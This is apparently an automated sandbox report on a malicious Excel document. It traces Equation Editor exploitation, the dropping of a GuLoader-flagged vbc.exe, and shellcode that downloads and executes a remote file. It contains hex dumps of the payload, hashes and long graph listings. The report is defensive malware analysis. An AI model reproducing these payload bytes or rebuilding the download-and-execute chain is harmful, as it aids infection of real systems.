00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELhOah:5@>@`=Y.textpfh `.rdatal@@.datax9@.ndata:.rsrcY`=Z@@
                  May 12, 2022 09:27:57.549215078 CEST  5  IN  Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 70 8a 7a 00 8d 45 a4
                  Data Ascii: U\}t+}FEuHhzHPuuu@BSV5pzEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                  May 12, 2022 09:27:57.549237013 CEST  6  IN  Data Raw: 7a 00 e9 f9 16 00 00 8b 88 40 8b 7a 00 89 88 e0 8a 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 e0 8a 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 e0 8a 7a 00 57 e9 31 16 00 00 8b 0d 30 7a 7a 00 8b 35 50
                  Data Ascii: z@zzE4z3;#MDE4zW10zz5P@;tuQEDzz;PQjuP@nmjPEH;tZj\V7Hf>ff;u9]tDtuIDuD;t=uu
                  May 12, 2022 09:27:57.549256086 CEST  7  IN  Data Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                  Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                  May 12, 2022 09:27:57.772262096 CEST  9  IN  Data Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 c8 35 00 00 56 e8 43 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 c3 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 84 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                  Data Ascii: uGSVj5VC;;j9]t!VI9]|PuD;tEV$@4jPMH;tvuMDvQEffjuMEQPjHEf;fEVj@8@;EjpHjEfHuEVSuU
                  May 12, 2022 09:27:57.772303104 CEST  10  IN  Data Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 c8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                  Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
                  May 12, 2022 09:27:57.772331953 CEST  12  IN  Data Raw: 08 e8 a4 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                  Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                  May 12, 2022 09:27:57.772360086 CEST  13  IN  Data Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 88 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                  Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uL6yy;rPjdQ@PEh@PT@EPuD@EPhuE+3V39t$ty;tP8@5y^95y
                  May 12, 2022 09:27:57.772386074 CEST  14  IN  Data Raw: 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 ce 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 60 81 40 00 c2 04
                  Data Ascii: 9u}uVWujXuE_^[t$t$5@+jjt$5@`@VX{V2Vu)u^V(V%VhP{1+^USVWj _3h]E@]@5@P]]u8Pf
                  May 12, 2022 09:27:57.772409916 CEST  16  IN  Data Raw: 00 bf 08 f7 79 00 a1 70 8a 7a 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 68 7b 00 ff 15 e4 80 40 00 85 c0 74 2c 53 57 e8 de 28 00 00 a1 70 8a 7a 00 ff b0 24 01 00 00 57 e8 4a 2b 00 00 57 e8 ea 20 00
                  Data Ascii: ypz W+Wp@9]t>jWhh{@t,SW(pz$WJ+W ;tP$@]fzMuSV(3@9]th u'!j@9ztvEPj(@P$@t/EPh0@S @SSESPSuEE@j7.;
                  May 12, 2022 09:27:57.772437096 CEST  17  IN  Data Raw: 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 3c 7a 7a 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 a1 8c 8a 7a 00 8b 35 88 8a 7a 00 85 c0 74 1b 8b f8 8b 06 85 c0 74 0a 50 8d 46 18 50 e8 0d 26 00 00 81 c6
                  Data Ascii: Qufu3<zzPW=%/z5zttPFP&Ou_^][V`zzjV%V5(zD@^SUVt$$;WaU|$$3GujUUUUW5(z@\$,uBHP5(zP@jW@%

                  Target ID:0
                  Start time:09:28:13
                  Start date:12/05/2022
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13fa20000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:09:28:36
                  Start date:12/05/2022
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:4
                  Start time:09:28:43
                  Start date:12/05/2022
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\Public\vbc.exe"
                  Imagebase:0x400000
                  File size:326847 bytes
                  MD5 hash:D5E55A57372BCAD45FBB260105179CAF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low


                    Execution Graph

                    Execution Coverage:3.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:59%
                    Total number of Nodes:161
                    Total number of Limit Nodes:2
                    execution_graph: rendered graph data omitted. Nodes are functions of the shellcode dumped from 0x03570000 (0x35701ea, 0x35702f6, 0x3570390, 0x35703a9, 0x35703c5, 0x35703ec, 0x3570420, 0x357044f, 0x35704ba, 0x3570504, 0x357051b); API nodes are LoadLibraryW (0x3570435), URLDownloadToFileW (0x3570460, 0x35704b1, 0x35704ba), ShellExecuteExW (0x357051a, 0x357051e), ExitProcess (0x3570390, 0x3570539, 0x357053c) and GetPEB (0x3570540).

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph: rendered graph data omitted. Nodes 0 to 44 are Function_03570000 through Function_035705B9 in the dumped region (Function_03570356, Function_03570215, Function_035702F6, Function_03570390, Function_035703A9, Function_035703C5, Function_03570420, Function_03570435, Function_0357044F, Function_035704BA, Function_03570504, Function_0357051B, Function_03570539, Function_03570540, Function_03570568 and others); most entry functions call the same chain Function_03570390, Function_035703C5, Function_0357044F, Function_035704BA, Function_03570504, Function_0357051B, Function_03570539 and Function_03570420.

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph data omitted. Basic blocks span 0x3570435-0x35705b6; LoadLibraryW is called in block 0x3570435-0x3570441, URLDownloadToFileW in block 0x35704b1-0x3570511, ShellExecuteExW in block 0x357051a-0x3570526 and ExitProcess in block 0x3570534-0x357053e, with subcalls to 0x357044f, 0x35704ba, 0x3570504, 0x357051b and 0x3570539.
                    APIs
                    • LoadLibraryW.KERNEL32(03570427), ref: 03570435
                      • Part of subcall function 0357044F: URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                      • Part of subcall function 0357044F: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 0357044F: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                    • String ID: <
                    • API String ID: 2508257586-4251816714
                    • Opcode ID: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
                    • Instruction ID: 151643cae512d2d2afddf649385455d42017b39da4f8458ec7c610f963d8cdef
                    • Opcode Fuzzy Hash: 03f0432b5a11b669deac01b082bc69d90379ed3555d8832cb03f9ed9560cd063
                    • Instruction Fuzzy Hash: 0B316BE680C3C12FD7239730AC69666BFA5AB57214F5989CED4C24A0F3E6688501C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph data omitted. Basic blocks span 0x35703a9-0x35705b6; URLDownloadToFileW is called in block 0x35704b1-0x3570511, ShellExecuteExW in block 0x357051a-0x3570526 and ExitProcess in block 0x3570534-0x357053e, with subcalls to 0x35705b9, 0x35703c5, 0x357044f, 0x35704ba, 0x3570420, 0x3570504, 0x357051b and 0x3570539.
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
                    • Instruction ID: c0b9017e5df352b2dba4295650580992198e86905bc766d581b5e97a8a2dcbba
                    • Opcode Fuzzy Hash: 24dbe183f2a2fd50b3f359701c40bba18532e36b12245b5d96bd6921655c4bbd
                    • Instruction Fuzzy Hash: DC51BCA680D3C16FD722D730BC69665BFA2BB53200F5D8ACED4C64B0F3E6688505C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph: rendered graph data omitted. Basic blocks span 0x35703c5-0x35705b6; URLDownloadToFileW is called in block 0x35704b1-0x3570511, ShellExecuteExW in block 0x357051a-0x3570526 and ExitProcess in block 0x3570534-0x357053e, with subcalls to 0x35705b9, 0x35703ec, 0x35704ba, 0x357044f, 0x3570420, 0x3570504, 0x357051b and 0x3570539.
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
                    • Instruction ID: 58a9f7820f0207521991134d86c0af598e3b4d2757b6c32b6a773668cf92d909
                    • Opcode Fuzzy Hash: c0582df5a932d594d70b2a51f27198aacfab6a3758f994f9b2ddf6cd703361f6
                    • Instruction Fuzzy Hash: B841AAA680D3C16FD723EB30BC6965ABFA1BF53100F498ACE94C64B0F3E6689505C756
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 0357044F, blocks 0357044F-035705B6, API calls URLDownloadToFileW, ShellExecuteExW, ExitProcess
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
                    • Instruction ID: c7d4d88df139a83ea3ce2c29563ffab5a565517600e8f6157bfde55a6c441c19
                    • Opcode Fuzzy Hash: d063475578b2e5cb5f42e1ce578550a3b89ec736e0c9c7a6e5d45bb2f6deec2c
                    • Instruction Fuzzy Hash: F4314BE680C3C16FDB239B30AC69666BFE16F57214F5989CED4C64B4F3E6688401C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 035704BA, blocks 035704BA-035705B6, API calls URLDownloadToFileW, ShellExecuteExW, ExitProcess
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03570460,?,00000000,00000000), ref: 035704BC
                      • Part of subcall function 03570504: ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 03570504: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID: <
                    • API String ID: 3584569557-4251816714
                    • Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                    • Instruction ID: 6b414c82decac0ea31f50790ad1efbdeafb70bfc77d262678a9fb39662d02cbc
                    • Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
                    • Instruction Fuzzy Hash: 4F0126E980C3806EE761EB34F88876ABAE4BFC4280F040859A446871F2EE74C904D605
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 03570504, blocks 03570504-035705B6, API calls ShellExecuteExW, ExitProcess
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                    • Instruction ID: 677e21c3d0826206622b880754c5480c4e744c87a89895fbcccc53fe8123b03e
                    • Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
                    • Instruction Fuzzy Hash: 9E01A2D880834668DF71F728F4882B9EED0FF822C4B9C8856A8D2470F5D9149583861D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 0357051B, blocks 0357051B-035705B6, API calls ShellExecuteExW, ExitProcess
                    APIs
                    • ShellExecuteExW.SHELL32(0000003C), ref: 03570526
                      • Part of subcall function 03570539: ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                    • Instruction ID: e47724598d3a48aaf9a4f9ddead151772435365a08fd565c062311a709ae5ff2
                    • Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
                    • Instruction Fuzzy Hash: E2F0FFC980426211DF30F668F8583BAAFD4FF922D0F8C8843A8C2070F5D96892C38A19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 03570539, single block 03570539-0357053E, API call ExitProcess
                    APIs
                    • ExitProcess.KERNEL32(00000000), ref: 0357053E
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 03570540, blocks 03570540-03570565, reads the PEB (GetPEB) and calls 03570568
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction ID: 4634eb66db5eaf4010e2bb0e8e77a610ef1ff3a33ef1398718d04785778674ef
                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction Fuzzy Hash: 95D052B1202502CFC344DF04E980E62F3BAFFC8661B28C268E0044B669C330E892CA90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Rendered control-flow graph (legend: Executed / Not Executed; node/edge listing omitted): function at 03570390, blocks 03570390-035705B6, API calls ExitProcess, URLDownloadToFileW, ShellExecuteExW
                    APIs
                    • ExitProcess.KERNEL32(0357037E), ref: 03570390
                    Memory Dump Source
                    • Source File: 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3570000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
                    • Instruction ID: df57c4bd598dbcc13cb50121db5ab24ad8be2d97a7f1b6fd62e4d147a772025a
                    • Opcode Fuzzy Hash: 92e99969890bcb78d68b0f15f2aeb8007205d658bbf80d9a294b31fbf41807e7
                    • Instruction Fuzzy Hash: A711BB5580E7C15FC712EB707E6A059FFB2B913100B5C86CB80C58B1F3E218964AD392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:17.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16%
                    Total number of Nodes:1586
                    Total number of Limit Nodes:31
                    • Rendered execution graph (node/edge listing omitted): functions at 00401xxx-00406xxx and 734F1xxx-734F2xxx; API calls named in the graph include DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, SetFileAttributesW, CreateDirectoryW, SetFileSecurityW, SetCurrentDirectoryW, RegOpenKeyExW, RegQueryValueExW, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, LoadLibraryExW, LoadLibraryW, GetProcAddress, GetModuleHandleW, VirtualAlloc, GlobalAlloc, GlobalFree, CreateFileW, ReadFile, WriteFile, SetFilePointer, GetShortPathNameW, GetFullPathNameW, GetDiskFreeSpaceW, SHBrowseForFolderW, CoTaskMemFree, IIDFromString, CLSIDFromString, StringFromGUID2, FindWindowExW, SendMessageTimeoutW, SendMessageW, CreateFontIndirectW, SetWindowLongW, ShowWindow, EnableWindow, Sleep
4975 4067a1 5 API calls 4971->4975 4972 4017a9 4973 405de9 3 API calls 4972->4973 4974 4017af lstrcatW 4973->4974 4974->4971 4992 4017bb 4975->4992 4976 406850 2 API calls 4976->4992 4977 405fe5 2 API calls 4977->4992 4979 4017cd CompareFileTime 4979->4992 4980 40188d 4981 40557c 24 API calls 4980->4981 4984 401897 4981->4984 4982 40557c 24 API calls 4991 401879 4982->4991 4983 40651a lstrcpynW 4983->4992 4985 4032b4 31 API calls 4984->4985 4986 4018aa 4985->4986 4987 4018be SetFileTime 4986->4987 4988 4018d0 CloseHandle 4986->4988 4987->4988 4990 4018e1 4988->4990 4988->4991 4989 406557 17 API calls 4989->4992 4993 4018e6 4990->4993 4994 4018f9 4990->4994 4992->4976 4992->4977 4992->4979 4992->4980 4992->4983 4992->4989 4997 405b7a MessageBoxIndirectW 4992->4997 5000 401864 4992->5000 5002 40600a GetFileAttributesW CreateFileW 4992->5002 4995 406557 17 API calls 4993->4995 4996 406557 17 API calls 4994->4996 4998 4018ee lstrcatW 4995->4998 4999 401901 4996->4999 4997->4992 4998->4999 4999->4991 5001 405b7a MessageBoxIndirectW 4999->5001 5000->4982 5000->4991 5001->4991 5002->4992 5003->4971 5004->4972 4053 734f2a7f 4054 734f2acf 4053->4054 4055 734f2a8f VirtualProtect 4053->4055 4055->4054 5375 4054f0 5376 405500 5375->5376 5377 405514 5375->5377 5378 405506 5376->5378 5379 40555d 5376->5379 5380 40551c IsWindowVisible 5377->5380 5386 405533 5377->5386 5382 4044c2 SendMessageW 5378->5382 5381 405562 CallWindowProcW 5379->5381 5380->5379 5383 405529 5380->5383 5384 405510 5381->5384 5382->5384 5385 404e31 5 API calls 5383->5385 5385->5386 5386->5381 5387 404eb1 4 API calls 5386->5387 5387->5379 5388 401a72 5389 402d84 17 API calls 5388->5389 5390 401a7b 5389->5390 5391 402d84 17 API calls 5390->5391 5392 401a20 5391->5392 5393 401573 5394 401583 ShowWindow 5393->5394 5395 40158c 5393->5395 5394->5395 5396 402c2a 5395->5396 5397 40159a ShowWindow 5395->5397 5397->5396 5398 4023f4 5399 402da6 17 API calls 5398->5399 5400 402403 5399->5400 5401 402da6 17 API calls 
5400->5401 5402 40240c 5401->5402 5403 402da6 17 API calls 5402->5403 5404 402416 GetPrivateProfileStringW 5403->5404 5405 4014f5 SetForegroundWindow 5406 402c2a 5405->5406 5407 734f1979 5409 734f199c 5407->5409 5408 734f19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5411 734f1312 2 API calls 5408->5411 5409->5408 5410 734f19d1 GlobalFree 5409->5410 5410->5408 5412 734f1b6e GlobalFree GlobalFree 5411->5412 5413 401ff6 5414 402da6 17 API calls 5413->5414 5415 401ffd 5414->5415 5416 406850 2 API calls 5415->5416 5417 402003 5416->5417 5419 402014 5417->5419 5420 406461 wsprintfW 5417->5420 5420->5419 4298 403f77 4299 4040f0 4298->4299 4300 403f8f 4298->4300 4301 404101 GetDlgItem GetDlgItem 4299->4301 4302 404141 4299->4302 4300->4299 4303 403f9b 4300->4303 4304 404476 18 API calls 4301->4304 4305 40419b 4302->4305 4317 401389 2 API calls 4302->4317 4306 403fa6 SetWindowPos 4303->4306 4307 403fb9 4303->4307 4310 40412b SetClassLongW 4304->4310 4362 4040eb 4305->4362 4371 4044c2 4305->4371 4306->4307 4308 403fc2 ShowWindow 4307->4308 4309 404004 4307->4309 4312 403fe2 GetWindowLongW 4308->4312 4313 4040dd 4308->4313 4314 404023 4309->4314 4315 40400c DestroyWindow 4309->4315 4316 40140b 2 API calls 4310->4316 4312->4313 4318 403ffb ShowWindow 4312->4318 4393 4044dd 4313->4393 4319 404028 SetWindowLongW 4314->4319 4320 404039 4314->4320 4370 4043ff 4315->4370 4316->4302 4321 404173 4317->4321 4318->4309 4319->4362 4320->4313 4325 404045 GetDlgItem 4320->4325 4321->4305 4326 404177 SendMessageW 4321->4326 4323 40140b 2 API calls 4360 4041ad 4323->4360 4324 404401 DestroyWindow EndDialog 4324->4370 4328 404073 4325->4328 4329 404056 SendMessageW IsWindowEnabled 4325->4329 4326->4362 4327 404430 ShowWindow 4327->4362 4331 404080 4328->4331 4332 404093 4328->4332 4333 4040c7 SendMessageW 4328->4333 4341 404078 4328->4341 4329->4328 4329->4362 4330 406557 17 API calls 4330->4360 4331->4333 4331->4341 4336 4040b0 4332->4336 4337 40409b 4332->4337 4333->4313 4335 
404476 18 API calls 4335->4360 4340 40140b 2 API calls 4336->4340 4387 40140b 4337->4387 4338 4040ae 4338->4313 4342 4040b7 4340->4342 4390 40444f 4341->4390 4342->4313 4342->4341 4344 404228 GetDlgItem 4345 404245 ShowWindow KiUserCallbackDispatcher 4344->4345 4346 40423d 4344->4346 4377 404498 KiUserCallbackDispatcher 4345->4377 4346->4345 4348 40426f EnableWindow 4353 404283 4348->4353 4349 404288 GetSystemMenu EnableMenuItem SendMessageW 4350 4042b8 SendMessageW 4349->4350 4349->4353 4350->4353 4353->4349 4378 4044ab SendMessageW 4353->4378 4379 403f58 4353->4379 4382 40651a lstrcpynW 4353->4382 4355 4042e7 lstrlenW 4356 406557 17 API calls 4355->4356 4357 4042fd SetWindowTextW 4356->4357 4383 401389 4357->4383 4359 404341 DestroyWindow 4361 40435b CreateDialogParamW 4359->4361 4359->4370 4360->4323 4360->4324 4360->4330 4360->4335 4360->4359 4360->4362 4374 404476 4360->4374 4363 40438e 4361->4363 4361->4370 4364 404476 18 API 